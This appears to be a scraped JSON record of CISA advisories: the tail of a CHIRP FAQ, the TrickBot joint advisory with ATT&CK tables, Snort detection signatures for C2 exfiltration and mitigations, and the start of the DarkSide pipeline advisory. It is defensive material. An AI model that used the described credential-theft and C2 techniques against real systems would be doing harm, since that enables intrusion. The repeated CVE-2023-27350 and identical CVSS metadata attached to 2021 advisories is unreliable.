CHIRP provides a complementary capability to Sparrow by scanning for on-premises systems for similar activity.\n\n 4. **How often should I run CHIRP?**\n\nCHIRP can be run once or routinely. Currently, CHIRP does not provide a mechanism to run repeatedly in its native format.\n\n 5. **Do I need to configure the tool before I run it?**\n\nNo.\n\n 6. **Will CHIRP change or affect anything on the system(s) it runs on?**\n\nNo, CHIRP only scans the system(s) it runs on and makes no active changes.\n\n 7. **How long will it take to run CHIRP?**\n\nCHIRP will complete its scan in approximately 1 to 2 hours. Duration will be dependent on the level of activity, the system, and the size of the resident data sets. CHIRP will provide periodic progress updates as it runs.\n\n 8. **If I have questions, who do I contact? **\n\nFor general questions regarding CHIRP, please contact CISA via email at [central@cisa.dhs.gov](<mailto:central@cisa.dhs.gov>) or by phone at 1-888-282-0870. For reporting indicators of potential compromise, contact us by submitting a report through our website at <https://us-cert.cisa.gov/report>. For all technical issues or support for CHIRP, please submit issues at the [CISA CHIRP GitHub Repository](<https://github.com/cisagov/CHIRP>). 
\n\n### Revisions\n\nMarch 18, 2021: Initial Publication |April 9, 2021: Fixed PDF (not related to content)|April 15, 2021: Updated with Attribution Statement\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-15T12:00:00", "type": "ics", "title": "Detecting Post-Compromise Threat Activity Using the CHIRP IOC Detection Tool", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-27350"], "modified": "2021-04-15T12:00:00", "id": "AA21-077A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-077a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-31T15:28:48", "description": "### Summary\n\n_This Joint Cybersecurity Advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework, Version 8. 
See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v8/techniques/enterprise/>) for all referenced threat actor tactics and techniques._\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) have observed continued targeting through spearphishing campaigns using TrickBot malware in North America. A sophisticated group of cybercrime actors is luring victims, via phishing emails, with a traffic infringement phishing scheme to download TrickBot.\n\nTrickBot\u2014first identified in 2016\u2014is a Trojan developed and operated by a sophisticated group of cybercrime actors. Originally designed as a banking Trojan to steal financial data, TrickBot has evolved into highly modular, multi-stage malware that provides its operators a full suite of tools to conduct a myriad of illegal cyber activities.\n\nTo secure against TrickBot, CISA and FBI recommend implementing the mitigation measures described in this Joint Cybersecurity Advisory, which include blocking suspicious Internet Protocol addresses, using antivirus software, and providing social engineering and phishing training to employees.\n\n### Technical Details\n\nTrickBot is an advanced Trojan that malicious actors spread primarily by spearphishing campaigns using tailored emails that contain malicious attachments or links, which\u2014if enabled\u2014execute malware (_Phishing: Spearphishing Attachment_ [[T1566.001](<https://attack.mitre.org/versions/v8/techniques/T1566/001/>)], _Phishing: Spearphishing Link_ [[T1566.002](<https://attack.mitre.org/versions/v8/techniques/T1566/002>)]). CISA and FBI are aware of recent attacks that use phishing emails, claiming to contain proof of a traffic violation, to steal sensitive information. The phishing emails contain links that redirect to a website hosted on a compromised server that prompts the victim to click on photo proof of their traffic violation. 
(_User Execution: Malicious Link_ [[T1204.001](<https://attack.mitre.org/versions/v8/techniques/T1204/001/>)], _User Execution: Malicious File_ [[T1204.002](<https://attack.mitre.org/versions/v8/techniques/T1204/002/>)]). In clicking the photo, the victim unknowingly downloads a malicious JavaScript file that, when opened, automatically communicates with the malicious actor\u2019s command and control (C2) server to download TrickBot to the victim\u2019s system (_Command and Scripting Interpreter: JavaScript_ [[T1059.007](<https://attack.mitre.org/versions/v8/techniques/T1059/007/>)]).\n\nAttackers can use TrickBot to:\n\n * Drop other malware, such as Ryuk and Conti ransomware, or\n * Serve as an Emotet downloader (_Ingress Tool Transfer_ [[T1105](<https://attack.mitre.org/versions/v8/techniques/T1105/>)]).[[1](<https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html>)]\n\nTrickBot uses person-in-the-browser attacks to steal information, such as login credentials (_Man in the Browser_ [[T1185](<https://attack.mitre.org/versions/v8/techniques/T1185/>)]). Additionally, some of TrickBot\u2019s modules spread the malware laterally across a network by abusing the Server Message Block (SMB) Protocol. 
TrickBot operators have a toolset capable of spanning the entirety of the MITRE ATT&CK framework, from actively or passively gathering information that can be used to support targeting (_Reconnaissance_ [[TA0043](<https://attack.mitre.org/tactics/TA0043/>)]), to trying to manipulate, interrupt, or destroy systems and data (_Impact_ [[TA0040](<https://attack.mitre.org/tactics/TA0040/>)]).\n\nTrickBot is capable of data exfiltration over a hardcoded C2 server, cryptomining, and host enumeration (e.g., reconnaissance of Unified Extensible Firmware Interface or Basic Input/Output System [UEFI/BIOS] firmware) (_Exfiltration Over C2 Channel_ [[T1041](<https://attack.mitre.org/versions/v8/techniques/T1041/>)], _Resource Hijacking_ [[T1496](<https://attack.mitre.org/versions/v8/techniques/T1496>)], _System Information Discovery_ [[T1082](<https://attack.mitre.org/versions/v8/techniques/T1082>)]).[[2](<https://eclypsium.com/2020/12/03/trickbot-now-offers-trickboot-persist-brick-profit/#background>)] For host enumeration, operators deliver TrickBot in modules containing a configuration file with specific tasks.\n\nFigure 1 lays out TrickBot\u2019s use of enterprise techniques.\n\n_Figure 1: MITRE ATT&CK enterprise techniques used by TrickBot_\n\n### MITRE ATT&CK Techniques\n\nAccording to MITRE, _TrickBot_ [[S0266](<https://attack.mitre.org/software/S0266/>)] uses the ATT&CK techniques listed in table 1.\n\n_Table 1: TrickBot ATT&CK techniques for enterprise_\n\n_Initial Access_ [[TA0001](<https://attack.mitre.org/versions/v8/tactics/TA0001/>)]\n\n**Technique Title** | **ID** | **Use** \n---|---|--- \nPhishing: Spearphishing Attachment | [T1566.001](<https://attack.mitre.org/versions/v8/techniques/T1566/001/>) | TrickBot has used an email with an Excel sheet containing a malicious macro to deploy the malware. \nPhishing: Spearphishing Link | [T1566.002](<https://attack.mitre.org/versions/v8/techniques/T1566/002>) | TrickBot has been delivered via malicious links in phishing emails. 
\n \n_Execution_ [[TA0002](<https://attack.mitre.org/versions/v8/tactics/TA0002/>)]\n\n**Technique Title** | **ID** | **Use** \n---|---|--- \nScheduled Task/Job: Scheduled Task | [T1053.005](<https://attack.mitre.org/versions/v8/techniques/T1053/005/>) | TrickBot creates a scheduled task on the system that provides persistence. \nCommand and Scripting Interpreter: Windows Command Shell | [T1059.003](<https://attack.mitre.org/versions/v8/techniques/T1059/003/>) | TrickBot has used macros in Excel documents to download and deploy the malware on the user\u2019s machine. \nCommand and Scripting Interpreter: JavaScript/JScript | [T1059.007](<https://attack.mitre.org/versions/v8/techniques/T1059/007/>) | TrickBot victims unknowingly download a malicious JavaScript file that, when opened, automatically communicates with the malicious actor\u2019s C2 server to download TrickBot to the victim\u2019s system. \nNative API | [T1106](<https://attack.mitre.org/versions/v8/techniques/T1106>) | TrickBot uses the Windows Application Programming Interface (API) call, CreateProcessW(), to manage execution flow. \nUser Execution: Malicious Link | [T1204.001](<https://attack.mitre.org/versions/v8/techniques/T1204/001/>) | TrickBot has sent spearphishing emails in an attempt to lure users to click on a malicious link. \nUser Execution: Malicious File | [T1204.002](<https://attack.mitre.org/versions/v8/techniques/T1204/002/>) | TrickBot has attempted to get users to launch malicious documents to deliver its payload. \n \n_Persistence_ [[TA0003](<https://attack.mitre.org/versions/v8/tactics/TA0003/>)]\n\n**Technique Title** | **ID** | **Use** \n---|---|--- \nScheduled Task/Job: Scheduled Task | [T1053.005](<https://attack.mitre.org/versions/v8/techniques/T1053/005/>) | TrickBot creates a scheduled task on the system that provides persistence. 
\nCreate or Modify System Process: Windows Service | [T1543.003](<https://attack.mitre.org/versions/v8/techniques/T1543/003/>) | TrickBot establishes persistence by creating an autostart service that allows it to run whenever the machine boots. \n \n_Privilege Escalation _[[TA0004](<https://attack.mitre.org/versions/v8/tactics/TA0004/>)]\n\n**Technique Title** | **ID** | **Use** \n---|---|--- \nScheduled Task/Job: Scheduled Task | [T1053.005](<https://attack.mitre.org/versions/v8/techniques/T1053/005/>) | TrickBot creates a scheduled task on the system that provides persistence. \nProcess Injection: Process Hollowing | [T1055.012](<https://attack.mitre.org/versions/v8/techniques/T1055/012/>) | TrickBot injects into the svchost.exe process. \nCreate or Modify System Process: Windows Service | [T1543.003](<https://attack.mitre.org/versions/v8/techniques/T1543/003/>) | TrickBot establishes persistence by creating an autostart service that allows it to run whenever the machine boots. \n \n_Defense Evasion_ [[TA0005](<https://attack.mitre.org/versions/v8/tactics/TA0005/>)]\n\n**Technique Title** | **ID** | **Use** \n---|---|--- \nObfuscated Files or Information | [T1027](<https://attack.mitre.org/versions/v8/techniques/T1027>) | TrickBot uses non-descriptive names to hide functionality and uses an AES CBC (256 bits) encryption algorithm for its loader and configuration files. \nObfuscated Files or Information: Software Packing | [T1027.002](<https://attack.mitre.org/versions/v8/techniques/T1027/002/>) | TrickBot leverages a custom packer to obfuscate its functionality. \nMasquerading | [T1036](<https://attack.mitre.org/versions/v8/techniques/T1036>) | The TrickBot downloader has used an icon to appear as a Microsoft Word document. \nProcess Injection: Process Hollowing | [T1055.012](<https://attack.mitre.org/versions/v8/techniques/T1055/012/>) | TrickBot injects into the svchost.exe process. 
\nModify Registry | [T1112](<https://attack.mitre.org/versions/v8/techniques/T1112/>) | TrickBot can modify registry entries. \nDeobfuscate/Decode Files or Information | [T1140](<https://attack.mitre.org/versions/v8/techniques/T1140>) | TrickBot decodes the configuration data and modules. \nSubvert Trust Controls: Code Signing | [T1553.002](<https://attack.mitre.org/versions/v8/techniques/T1553/002/>) | TrickBot has come with a signed downloader component. \nImpair Defenses: Disable or Modify Tools | [T1562.001](<https://attack.mitre.org/versions/v8/techniques/T1562/001/>) | TrickBot can disable Windows Defender. \n \n_Credential Access_ [[TA0006](<https://attack.mitre.org/versions/v8/tactics/TA0006/>)]\n\n**Technique Title** | **ID** | **Use** \n---|---|--- \nInput Capture: Credential API Hooking | [T1056.004](<https://attack.mitre.org/versions/v8/techniques/T1056/004/>) | TrickBot has the ability to capture Remote Desktop Protocol credentials by capturing the CredEnumerateA API. \nUnsecured Credentials: Credentials in Files | [T1552.001](<https://attack.mitre.org/versions/v8/techniques/T1552/001/>) | TrickBot can obtain passwords stored in files from several applications such as Outlook, Filezilla, OpenSSH, OpenVPN and WinSCP. Additionally, it searches for the .vnc.lnk affix to steal VNC credentials. \nUnsecured Credentials: Credentials in Registry | [T1552.002](<https://attack.mitre.org/versions/v8/techniques/T1552/002/>) | TrickBot has retrieved PuTTY credentials by querying the Software\\SimonTatham\\Putty\\Sessions registry key. \nCredentials from Password Stores | [T1555](<https://attack.mitre.org/versions/v8/techniques/T1555>) | TrickBot can steal passwords from the KeePass open-source password manager. 
\nCredentials from Password Stores: Credentials from Web Browsers | [T1555.003](<https://attack.mitre.org/versions/v8/techniques/T1555/003/>) | TrickBot can obtain passwords stored in files from web browsers such as Chrome, Firefox, Internet Explorer, and Microsoft Edge, sometimes using esentutl. \n \n_Discovery_ [[TA0007](<https://attack.mitre.org/versions/v8/tactics/TA0007/>)]\n\n**Technique Title** | **ID** | **Use** \n---|---|--- \nSystem Service Discovery | [T1007](<https://attack.mitre.org/versions/v8/techniques/T1007/>) | TrickBot collects a list of installed programs and services on the victim\u2019s machine. \nSystem Network Configuration Discovery | [T1016](<https://attack.mitre.org/versions/v8/techniques/T1016>) | TrickBot obtains the IP address, location, and other relevant network information from the victim\u2019s machine. \nRemote System Discovery | [T1018](<https://attack.mitre.org/versions/v8/techniques/T1018>) | TrickBot can enumerate computers and network devices. \nSystem Owner/User Discovery | [T1033](<https://attack.mitre.org/versions/v8/techniques/T1033>) | TrickBot can identify the user and groups the user belongs to on a compromised host. \nPermission Groups Discovery | [T1069](<https://attack.mitre.org/versions/v8/techniques/T1069>) | TrickBot can identify the groups the user on a compromised host belongs to. \nSystem Information Discovery | [T1082](<https://attack.mitre.org/versions/v8/techniques/T1082>) | TrickBot gathers the OS version, machine name, CPU type, and amount of RAM available from the victim\u2019s machine. \nFile and Directory Discovery | [T1083](<https://attack.mitre.org/versions/v8/techniques/T1083>) | TrickBot searches the system for all of the following file extensions: .avi, .mov, .mkv, .mpeg, .mpeg4, .mp4, .mp3, .wav, .ogg, .jpeg, .jpg, .png, .bmp, .gif, .tiff, .ico, .xlsx, and .zip. It can also obtain browsing history, cookies, and plug-in information. 
\nAccount Discovery: Local Account | [T1087.001](<https://attack.mitre.org/versions/v8/techniques/T1087/001>) | TrickBot collects the users of the system. \nAccount Discovery: Email Account | [T1087.003](<https://attack.mitre.org/versions/v8/techniques/T1087/003>) | TrickBot collects email addresses from Outlook. \nDomain Trust Discovery | [T1482](<https://attack.mitre.org/versions/v8/techniques/T1482>) | TrickBot can gather information about domain trusts by utilizing Nltest. \n \n_Lateral Movement_ [[TA0008](<https://attack.mitre.org/versions/v8/tactics/TA0008/>)]\n\n**Technique Title** | **ID** | **Use** \n---|---|--- \nLateral Tool Transfer | [T1570](<https://attack.mitre.org/versions/v8/techniques/T1570>) | Some TrickBot modules spread the malware laterally across a network by abusing the SMB Protocol. \n \n_Collection_ [[TA0009](<https://attack.mitre.org/versions/v8/tactics/TA0009/>)]\n\n**Technique Title** | **ID** | **Use** \n---|---|--- \nData from Local System | [T1005](<https://attack.mitre.org/versions/v8/techniques/T1005>) | TrickBot collects local files and information from the victim\u2019s local machine. \nInput Capture: Credential API Hooking | [T1056.004](<https://attack.mitre.org/versions/v8/techniques/T1056/004/>) | TrickBot has the ability to capture Remote Desktop Protocol credentials by capturing the CredEnumerateA API. \nPerson in the Browser | [T1185](<https://attack.mitre.org/versions/v8/techniques/T1185>) | TrickBot uses web injects and browser redirection to trick the user into providing their login credentials on a fake or modified webpage. 
\n \n_Command and Control_ [[TA0011](<https://attack.mitre.org/versions/v8/tactics/TA0011/>)]\n\n**Technique Title** | **ID** | **Use** \n---|---|--- \nFallback Channels | [T1008](<https://attack.mitre.org/versions/v8/techniques/T1008>) | TrickBot can use secondary command and control (C2) servers for communication after establishing connectivity and relaying victim information to primary C2 servers. \nApplication Layer Protocol: Web Protocols | [T1071.001](<https://attack.mitre.org/versions/v8/techniques/T1071/001>) | TrickBot uses HTTPS to communicate with its C2 servers, to get malware updates, modules that perform most of the malware logic and various configuration files. \nIngress Tool Transfer | [T1105](<https://attack.mitre.org/versions/v8/techniques/T1105>) | TrickBot downloads several additional files and saves them to the victim's machine. \nData Encoding: Standard Encoding | [T1132.001](<https://attack.mitre.org/versions/v8/techniques/T1132/001>) | TrickBot can Base64-encode C2 commands. \nNon-Standard Port | [T1571](<https://attack.mitre.org/versions/v8/techniques/T1571>) | Some TrickBot samples have used HTTP over ports 447 and 8082 for C2. \nEncrypted Channel: Symmetric Cryptography | [T1573.001](<https://attack.mitre.org/versions/v8/techniques/T1573/001>) | TrickBot uses a custom crypter leveraging Microsoft\u2019s CryptoAPI to encrypt C2 traffic. \n \n_Exfiltration_ [[TA0010](<https://attack.mitre.org/versions/v8/tactics/TA0010/>)]\n\n**Technique Title** | **ID** | **Use** \n---|---|--- \nExfiltration Over C2 Channel | [T1041](<https://attack.mitre.org/versions/v8/techniques/T1041>) | TrickBot can send information about the compromised host to a hardcoded C2 server. 
\n \n_Impact_ [[TA0040](<https://attack.mitre.org/versions/v8/tactics/TA0040/>)]\n\n**Technique Title** | **ID** | **Use** \n---|---|--- \nResource Hijacking | [T1496](<https://attack.mitre.org/versions/v8/techniques/T1496>) | TrickBot actors can leverage the resources of co-opted systems for cryptomining to validate transactions of cryptocurrency networks and earn virtual currency. \n \n### Detection\n\n#### Signatures\n\nCISA developed the following Snort signatures for use in detecting network activity associated with TrickBot.\n\nalert tcp any [443,447] -> any any (msg:\"TRICKBOT:SSL/TLS Server X.509 Cert Field contains 'example.com' (Hex)\"; sid:1; rev:1; flow:established,from_server; ssl_state:server_hello; content:\"|0b|example.com\"; fast_pattern:only; content:\"Global Security\"; content:\"IT Department\"; pcre:\"/(?:\\x09\\x00\\xc0\\xb9\\x3b\\x93\\x72\\xa3\\xf6\\xd2|\\x00\\xe2\\x08\\xff\\xfb\\x7b\\x53\\x76\\x3d)/\"; classtype:bad-unknown; metadata:service ssl,service and-ports;)\n\nalert tcp any any -> any $HTTP_PORTS (msg:\"TRICKBOT_ANCHOR:HTTP URI GET contains '/anchor'\"; sid:1; rev:1; flow:established,to_server; content:\"/anchor\"; http_uri; fast_pattern:only; content:\"GET\"; nocase; http_method; pcre:\"/^\\/anchor_?.{3}\\/[\\w_-]+\\\\.[A-F0-9]+\\/?$/U\"; classtype:bad-unknown; priority:1; metadata:service http;)\n\nalert tcp any $SSL_PORTS -> any any (msg:\"TRICKBOT:SSL/TLS Server X.509 Cert Field contains 'C=XX, L=Default City, O=Default Company Ltd'\"; sid:1; rev:1; flow:established,from_server; ssl_state:server_hello; content:\"|31 0b 30 09 06 03 55 04 06 13 02|XX\"; nocase; content:\"|31 15 30 13 06 03 55 04 07 13 0c|Default City\"; nocase; content:\"|31 1c 30 1a 06 03 55 04 0a 13 13|Default Company Ltd\"; nocase; content:!\"|31 0c 30 0a 06 03 55 04 03|\"; classtype:bad-unknown; reference:url,www.virustotal.com/gui/file/e9600404ecc42cf86d38deedef94068db39b7a0fd06b3b8fb2d8a3c7002b650e/detection; metadata:service ssl;)\n\nalert tcp any 
any -> any $HTTP_PORTS (msg:\"TRICKBOT:HTTP Client Header contains 'boundary=Arasfjasu7'\"; sid:1; rev:1; flow:established,to_server; content:\"boundary=Arasfjasu7|0d 0a|\"; http_header; content:\"name=|22|proclist|22|\"; http_header; content:!\"Referer\"; content:!\"Accept\"; content:\"POST\"; http_method; classtype:bad-unknown; metadata:service http;)\n\nalert tcp any any -> any $HTTP_PORTS (msg:\"TRICKBOT:HTTP Client Header contains 'User-Agent|3a 20|WinHTTP loader/1.'\"; sid:1; rev:1; flow:established,to_server; content:\"User-Agent|3a 20|WinHTTP loader/1.\"; http_header; fast_pattern:only; content:\".png|20|HTTP/1.\"; pcre:\"/^Host\\x3a\\x20(?:\\d{1,3}\\\\.){3}\\d{1,3}(?:\\x3a\\d{2,5})?$/mH\"; content:!\"Accept\"; http_header; content:!\"Referer|3a 20|\"; http_header; classtype:bad-unknown; metadata:service http;)\n\nalert tcp any $HTTP_PORTS -> any any (msg:\"TRICKBOT:HTTP Server Header contains 'Server|3a 20|Cowboy'\"; sid:1; rev:1; flow:established,from_server; content:\"200\"; http_stat_code; content:\"Server|3a 20|Cowboy|0d 0a|\"; http_header; fast_pattern; content:\"content-length|3a 20|3|0d 0a|\"; http_header; file_data; content:\"/1/\"; depth:3; isdataat:!1,relative; classtype:bad-unknown; metadata:service http;)\n\nalert tcp any any -> any $HTTP_PORTS (msg:\"TRICKBOT:HTTP URI POST contains C2 Exfil\"; sid:1; rev:1; flow:established,to_server; content:\"Content-Type|3a 20|multipart/form-data|3b 20|boundary=------Boundary\"; http_header; fast_pattern; content:\"User-Agent|3a 20|\"; http_header; distance:0; content:\"Content-Length|3a 20|\"; http_header; distance:0; content:\"POST\"; http_method; pcre:\"/^\\/[a-z]{3}\\d{3}\\/.+?\\\\.[A-F0-9]{32}\\/\\d{1,3}\\//U\"; pcre:\"/^Host\\x3a\\x20(?:\\d{1,3}\\\\.){3}\\d{1,3}$/mH\"; content:!\"Referer|3a|\"; http_header; classtype:bad-unknown; metadata:service http;)\n\nalert tcp any any -> any $HTTP_PORTS (msg:\"HTTP URI GET/POST contains '/56evcxv' (Trickbot)\"; sid:1; rev:1; flow:established,to_server; 
content:\"/56evcxv\"; http_uri; fast_pattern:only; classtype:bad-unknown; metadata:service http;)\n\nalert icmp any any -> any any (msg:\"TRICKBOT_ICMP_ANCHOR:ICMP traffic conatins 'hanc'\"; sid:1; rev:1; itype:8; content:\"hanc\"; offset:4; fast_pattern; classtype:bad-unknown;)\n\nalert tcp any any -> any $HTTP_PORTS (msg:\"HTTP Client Header contains POST with 'host|3a 20|*.onion.link' and 'data=' (Trickbot/Princess Ransomeware)\"; sid:1; rev:1; flow:established,to_server; content:\"POST\"; nocase; http_method; content:\"host|3a 20|\"; http_header; content:\".onion.link\"; nocase; http_header; distance:0; within:47; fast_pattern; file_data; content:\"data=\"; distance:0; within:5; classtype:bad-unknown; metadata:service http;)\n\nalert tcp any any -> any $HTTP_PORTS (msg:\"HTTP Client Header contains 'host|3a 20|tpsci.com' (trickbot)\"; sid:1; rev:1; flow:established,to_server; content:\"host|3a 20|tpsci.com\"; http_header; fast_pattern:only; classtype:bad-unknown; metadata:service http;)\n\n### Mitigations\n\nCISA and FBI recommend that network defenders\u2014in federal, state, local, tribal, territorial governments, and the private sector\u2014consider applying the following best practices to strengthen the security posture of their organization's systems. 
System owners and administrators should review any configuration changes prior to implementation to avoid negative impacts.\n\n * Provide social engineering and phishing training to employees.\n * Consider drafting or updating a policy addressing suspicious emails that specifies users must report all suspicious emails to the security and/or IT departments.\n * Mark external emails with a banner denoting the email is from an external source to assist users in detecting spoofed emails.\n * Implement Group Policy Object and firewall rules.\n * Implement an antivirus program and a formalized patch management process.\n * Implement filters at the email gateway and block suspicious IP addresses at the firewall.\n * Adhere to the principle of least privilege.\n * Implement a Domain-Based Message Authentication, Reporting & Conformance validation system.\n * Segment and segregate networks and functions.\n * Limit unnecessary lateral communications between network hosts, segments, and devices.\n * Consider using application allowlisting technology on all assets to ensure that only authorized software executes, and all unauthorized software is blocked from executing on assets. Ensure that such technology only allows authorized, digitally signed scripts to run on a system.\n * Enforce multi-factor authentication.\n * Enable a firewall on agency workstations configured to deny unsolicited connection requests.\n * Disable unnecessary services on agency workstations and servers.\n * Implement an Intrusion Detection System, if not already used, to detect C2 activity and other potentially malicious network activity.\n * Monitor web traffic. 
Restrict user access to suspicious or risky sites.\n * Maintain situational awareness of the latest threats and implement appropriate access control lists.\n * Disable the use of SMBv1 across the network and require at least SMBv2 to harden systems against network propagation modules used by TrickBot.\n * Visit the MITRE ATT&CK Techniques pages (linked in table 1 above) for additional mitigation and detection strategies.\n * See CISA\u2019s Alert on [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/ncas/alerts/aa20-245a>) for more information on addressing potential incidents and applying best practice incident response procedures.\n\nFor additional information on malware incident prevention and handling, see the National Institute of Standards and Technology Special Publication 800-83, [Guide to Malware Incident Prevention and Handling for Desktops and Laptops](<https://csrc.nist.gov/publications/detail/sp/800-83/rev-1/final>).\n\n### Resources\n\n * CISA Fact Sheet: TrickBot Malware\n * [MS-ISAC White Paper: Security Primer \u2013 TrickBot](<https://www.cisecurity.org/white-papers/security-primer-trickbot/>)\n * [United Kingdom National Cyber Security Centre Advisory: Ryuk Ransomware Targeting Organisations Globally](<https://www.ncsc.gov.uk/news/ryuk-advisory>)\n * [CISA and MS-ISAC Joint Alert AA20-280A: Emotet Malware](<https://us-cert.cisa.gov/ncas/alerts/aa20-280a>)\n * [MITRE ATT&CK for Enterprise](<https://attack.mitre.org/matrices/enterprise/>)\n\n### References\n\n[[1] FireEye Blog - A Nasty Trick: From Credential Theft Malware to Business Disruption](<https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html>)\n\n[[2] Eclypsium Blog - TrickBot Now Offers 'TrickBoot': Persist, Brick, Profit](<https://eclypsium.com/2020/12/03/trickbot-now-offers-trickboot-persist-brick-profit/#background>)\n\n### Revisions\n\nMarch 17, 2021: Initial 
Version|March 24, 2021: Added MITRE ATT&CK Technique T1592.003 used for reconnaissance|May 20, 2021: Added new MITRE ATT&CKs and updated Table 1\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-20T12:00:00", "type": "ics", "title": "TrickBot Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-27350"], "modified": "2021-05-20T12:00:00", "id": "AA21-076A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-076a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-31T15:27:28", "description": "### Summary\n\nSee Technical Details section\n\n### Technical Details\n\nTable 1 provides a summary of the MITRE ATT&CK techniques observed.\n\n_Table 1: MITRE ATT&CK techniques observed_\n\nTechnique Title\n\n| Technique ID \n---|--- \n \nProcess Injection: Dynamic-link Library Injection\n\n| \n\n[T1055.001](<https://attack.mitre.org/versions/v9/techniques/T1055/001/>) \n \n_Ingress Tool Transfer_\n\n| \n\n[T1105](<https://attack.mitre.org/versions/v9/techniques/T1105/>) \n \nUser Execution: Malicious Link\n\n| 
\n\n[T1204.001](<https://attack.mitre.org/versions/v9/techniques/T1204/001/>) \n \n_Phishing: Spearphishing Link_\n\n| \n\n[T1566.002](<https://attack.mitre.org/versions/v9/techniques/T1566/002/>) \n \n### Revisions\n\nMay 28, 2021\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-28T12:00:00", "type": "ics", "title": "ATT&CK Table for Sophisticated Spearphishing Campaign CSA", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-27350"], "modified": "2021-05-28T12:00:00", "id": "AA21-0000A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-0000a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-31T15:27:47", "description": "### Summary\n\n_This Advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework, Version 9. 
See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v8/techniques/enterprise/>) for all referenced threat actor tactics and techniques._\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) are aware of a ransomware attack affecting a critical infrastructure (CI) entity\u2014a pipeline company\u2014in the United States. Malicious cyber actors deployed DarkSide ransomware against the pipeline company\u2019s information technology (IT) network.[[1](<https://www.colpipe.com/news/press-releases/media-statement-colonial-pipeline-system-disruption>)] At this time, there is no indication that the entity\u2019s operational technology (OT) networks have been directly affected by the ransomware.\n\nCISA and FBI urge CI asset owners and operators to adopt a heightened state of awareness and implement the recommendations listed in the Mitigations section of this Joint Cybersecurity Advisory, including implementing robust network segmentation between IT and OT networks; regularly testing manual controls; and ensuring that backups are implemented, regularly tested, and isolated from network connections. These mitigations will help CI owners and operators improve their entity's functional resilience by reducing their vulnerability to ransomware and the risk of severe business degradation if impacted by ransomware.\n\n * **(Updated May 19, 2021):** Click here for a STIX package of indicators of compromise (IOCs). **Note:** These IOCs were shared with critical infrastructure partners and network defenders on May 10, 2021. The applications listed in the IOCs were leveraged by the threat actors during the course of a compromise. Some of these applications might appear within an organization's enterprise to support legitimate purposes; however, these applications can be used by threat actors to aid in malicious exploitation of an organization's enterprise. 
